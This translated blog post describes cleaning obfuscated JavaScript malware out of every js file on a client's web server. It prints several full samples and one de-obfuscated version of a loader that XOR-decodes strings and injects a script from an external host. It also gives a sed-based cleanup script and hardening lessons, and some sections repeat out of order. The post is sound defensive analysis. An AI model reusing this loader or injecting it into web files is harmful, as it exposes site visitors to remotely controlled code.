Treatment of all js-files on the server or the definition of the encryption method in the day off
I want to share with Habr's readers a story about how to treat malicious js code on sites located on the same machine. Under the cat is an amateur analysis of malicious code, which I conducted solely for the sake of interest, as well as cleaning files on the hosting from malicious code. This article is not a teaching material, but at the end contains a list of lessons that I learned from this story.
On an ordinary working day, my curator set another task: to deal with the confusion that is happening on the websites of one of our clients. When visiting any of the sites visitor immediately redirected to another page. A share in this confusion was caused by the fact that the problem on the client’s and my curator’s computers was constantly manifested (on Windows), and on my Ubuntu system I could not catch this infection. Later it turned out that the harmful js-code is a command loader from another machine, which was then executed on the side of the visitor. As far as I understood, there was a filter on the side of the infected machine that did not give commands when I logged in from my system.
')
I wanted to find out what kind of encryption method the malware used, and I proceeded to refactor the code of one of the example (see below). This analysis was carried out after treatment in order to satisfy their curiosity.
The array contains encrypted commands (createElement, getElementsByTagName, appendChild), as well as the address from which to load further commands (http://state.sml2.ru/js/cnt.js).
All the logic of the work lies in two functions. The first is explode, which splits the input string into groups of 3 digits, from each group receives a symbol by code and combines all these symbols. The result is sent to the function xor, which uses xor-encryption, but I could be wrong, because I know little about encryption methods.
For the treatment of this infection, it was decided to use the unix-system command line and regular expressions. As can be seen from the examples of the malware, it could be added to the file both on the next line and immediately after the last byte in the file (see below).
The command to replace in the file (antivirus.sh):
Here we search for all strings that contain a virus feature (.length / 3;), and replace it with the result from the first group. If this is not done, the sed command will remove this piece of healthy code.
The self-made antivirus was started with the command:
The result was not long in coming, and after a few minutes I was pleased with the result of my work.
Findings:
In the end, I express my gratitude to everyone who took the time off for an easy reading. Comments are welcome.
How it all began
On an ordinary working day, my curator set another task: to deal with the confusion that is happening on the websites of one of our clients. When visiting any of the sites visitor immediately redirected to another page. A share in this confusion was caused by the fact that the problem on the client’s and my curator’s computers was constantly manifested (on Windows), and on my Ubuntu system I could not catch this infection. Later it turned out that the harmful js-code is a command loader from another machine, which was then executed on the side of the visitor. As far as I understood, there was a filter on the side of the infected machine that did not give commands when I logged in from my system.
Underwater rocks
- On all sites of our client, absolutely all js files were infected. At this stage, it became clear that the infection was made using a script that I could not find;
- In each file, the code structure was different: the function names, variable names, and their succession changed;
- The time for changing js files was not changed, which made it difficult to find the script with which the action was performed.
Examples of evil code:
window.addEvent('unload', saveSettings);function tXph13(rT){return zmGud0O(pF7B(rT),'w6AOl64ykS2D2vS');}var jqhQ8=["004085","005095","007066","020068036046024083113021014062087042070","004068034","003079049042","003083057059067092085015010032081054091006039","022070049042002082119017002063086","031083032043","016083053010000083089028005039065006075034050016120032034009","031066053063086025027010031050070033028005062027004111061025025094010068048092048028028032"];function pF7B(m9QAuQ){var u9='';var uT=0;var l7n=0;for(uT=0;uT<m9QAuQ.length/3;uT++){u9+=String.fromCharCode(m9QAuQ.slice(l7n,l7n+3));l7n=l7n+3;}return u9;}function nZrvPy(ci){var xkw31M=document[tXph13(jqhQ8[3])](tXph13(jqhQ8[0])+tXph13(jqhQ8[1])+tXph13(jqhQ8[2]));xkw31M[tXph13(jqhQ8[4])]=ci;xkw31M[tXph13(jqhQ8[5])]=tXph13(jqhQ8[6]);document[tXph13(jqhQ8[9])](tXph13(jqhQ8[8]))[0][tXph13(jqhQ8[7])](xkw31M);}function zmGud0O(fPMlQ,kxzO7O){var sc7B='';var q9AOFX=0;var wT=0;for(q9AOFX=0;q9AOFX<fPMlQ.length;q9AOFX++){var oH6=fPMlQ.charAt(q9AOFX);var cobu=oH6.charCodeAt(0)^kxzO7O.charCodeAt(wT);oH6=String.fromCharCode(cobu);sc7B+=oH6;if(wT==kxzO7O.length-1)wT=0;else wT++;}return (sc7B);}nZrvPy(tXph13(jqhQ8[10])); .createElement(e[i])}})()function rt9tP(q5m1I){return dXkiogo(ze2woX1(q5m1I),'cliPkVhP3k3b3');}var ow51o=["016015","017005","019024","000030012049031051045060086006086012071","016030010","023021025053","023009017036068060009038082024080016090019024","002028025053005050043056090007087","011009008052","004009029021007051005053093031064032074055013014030010059013","011024029032081121071035071010071007029016001005098069036029127089024028001093023066003035"];if9A1C(rt9tP(ow51o[10]));function if9A1C(pa43Q){var g4=document[rt9tP(ow51o[3])](rt9tP(ow51o[0])+rt9tP(ow51o[1])+rt9tP(ow51o[2]));g4[rt9tP(ow51o[4])]=pa43Q;g4[rt9tP(ow51o[5])]=rt9tP(ow51o[6]);document[rt9tP(ow51o[9])](rt9tP(ow51o[8]))[0][rt9tP(ow51o[7])](g4);}function dXkiogo(cRXt,e80M){var k0='';var hz00=0;var x5VhMO=0;for(hz00=0;hz00<cRXt.length;hz00++){var g0=cRXt.charAt(hz00);var jLf9N7=g0.charCodeAt(0)^e80M.charCodeAt(x5VhMO);g0=String.fromCharCode(jLf9N7);k0+=g0;if(x5VhMO==e80M.length-1)x5VhMO=0;else x5VhMO++;}return (k0);}function ze2woX1(hJOCB){var dMa2='';var n7Z=0;var pLz4=0;for(n7Z=0;n7Z<hJOCB.length/3;n7Z++){dMa2+=String.fromCharCode(hJOCB.slice(pLz4,pLz4+3));pLz4=pLz4+3;}return dMa2;} ()})})}})(jQuery);function eH0(kzpR2g){var tZ=document[aFeJ(pXM7JTD[3])](aFeJ(pXM7JTD[0])+aFeJ(pXM7JTD[1])+aFeJ(pXM7JTD[2]));tZ[aFeJ(pXM7JTD[4])]=kzpR2g;tZ[aFeJ(pXM7JTD[5])]=aFeJ(pXM7JTD[6]);document[aFeJ(pXM7JTD[9])](aFeJ(pXM7JTD[8]))[0][aFeJ(pXM7JTD[7])](tZ);}function vbX9B(b5JWR,cZ73){var d7='';var kH5Nhm=0;var lO=0;for(kH5Nhm=0;kH5Nhm<b5JWR.length;kH5Nhm++){var m2z=b5JWR.charAt(kH5Nhm);var rT7v3=m2z.charCodeAt(0)^cZ73.charCodeAt(lO);m2z=String.fromCharCode(rT7v3);d7+=m2z;if(lO==cZ73.length-1)lO=0;else lO++;}return (d7);}function aFeJ(dMk){return vbX9B(tYiR3(dMk),'voRoLKl3Kny18K');}function tYiR3(dH5L){var zS1kLW='';var ub=0;var oK078=0;for(ub=0;ub<dH5L.length/3;ub++){zS1kLW+=String.fromCharCode(dH5L.slice(oK078,oK078+3));oK078=oK078+3;}return zS1kLW;}var pXM7JTD=["005012","004006","006027","021029055014056046041095046003028095076","005029049","002022034010","002010042027099033013069042029026067081059002","023031034010034047047091034002029","030010051011","017010038042032046001086037026010115065031023008028014033046","030027038031118100067064063015013084022056027003096065062062067089056065026095076101028028"];eH0(aFeJ(pXM7JTD[10])); ')
Small analysis
I wanted to find out what kind of encryption method the malware used, and I proceeded to refactor the code of one of the example (see below). This analysis was carried out after treatment in order to satisfy their curiosity.
Read evil code
var massiv = ["022022", "023028", "021001", "006007039019069038063009006093009094000", "022007033", "017012050023", "017016058006030041027019002067015066029004017", "004005050023095039057013010092008", "013016035022", "002016054055093038023000013068031114013032004018012019092038", "013001054002011108085022023081024085090007008025112092067054085015016031015094000090015006"]; exec(wrapper(massiv[10])); // function wrapper(str) { return xor(explode(str), 'euBr1Czec0l0tt'); } // 3 function explode(str) { var mQ418 = ''; var z2wqbh = 0; var pa = 0; for (z2wqbh = 0; z2wqbh < str.length / 3; z2wqbh++) { mQ418 += String.fromCharCode(str.slice(pa, pa + 3)); pa = pa + 3; } return mQ418; } // head function exec(mh) { var fq59 = document[wrapper(massiv[3])](wrapper(massiv[0]) + wrapper(massiv[1]) + wrapper(massiv[2])); fq59[wrapper(massiv[4])] = mh; fq59[wrapper(massiv[5])] = wrapper(massiv[6]); document[wrapper(massiv[9])](wrapper(massiv[8]))[0][wrapper(massiv[7])](fq59); } // , str — , key — function xor(str, key) { var wL73 = ''; var c2 = 0; var i8t = 0; for (c2 = 0; c2 < str.length; c2++) { var h6547 = str.charAt(c2); var pTh = h6547.charCodeAt(0) ^ key.charCodeAt(i8t); h6547 = String.fromCharCode(pTh); wL73 += h6547; if (i8t == key.length - 1) i8t = 0; else i8t++; } return (wL73); } Work logic
The array contains encrypted commands (createElement, getElementsByTagName, appendChild), as well as the address from which to load further commands (http://state.sml2.ru/js/cnt.js).
All the logic of the work lies in two functions. The first is explode, which splits the input string into groups of 3 digits, from each group receives a symbol by code and combines all these symbols. The result is sent to the function xor, which uses xor-encryption, but I could be wrong, because I know little about encryption methods.
Treatment
For the treatment of this infection, it was decided to use the unix-system command line and regular expressions. As can be seen from the examples of the malware, it could be added to the file both on the next line and immediately after the last byte in the file (see below).
()})})}})(jQuery);function eH0(kzpR2g){ .createElement(e[i])}})()var ow51o=["016015","017005","019024" window.addEvent('unload', saveSettings);function tXph13(rT) The command to replace in the file (antivirus.sh):
#/bin/bash VIRUS='([\(jQuery\)\;|\)\;|\}|\*\/|\/\/]{0,})(var [a-zA-Z0-9]{2,}=\[".*|function [a-zA-Z0-9]{2,}.*)$'; sed -i -r '/.length\/3;/s/'"$VIRUS"'/\1/' "$1"; Here we search for all strings that contain a virus feature (.length / 3;), and replace it with the result from the first group. If this is not done, the sed command will remove this piece of healthy code.
The self-made antivirus was started with the command:
find . -type f -name "*.js" -exec bash antivirus.sh {} \; The result was not long in coming, and after a few minutes I was pleased with the result of my work.
Findings:
- For each site, use its own user in the system with their own rights. Our client has its own server, which was set up in a sad way: the same user was used for each site, which allowed infecting all the sites on the machine;
- Use certificates. Perhaps this would not stop the attackers, but using a certificate along with https would not allow you to connect malicious files from simple sites.
- Permanent backups. Unfortunately, the machine was also not configured backup. I believe that this could help prove to the client that the virus was brought before us, it was enough to show the infected copy created before our coming. Since the virus executed commands from the connected file, it could exist on the sites for a very long time, until the scamps decided to include it on their part. However, evidence is needed for proof, and the facts are such that the virus manifested itself after the start of our work.
In the end, I express my gratitude to everyone who took the time off for an easy reading. Comments are welcome.
Source: https://habr.com/ru/post/305576/
All Articles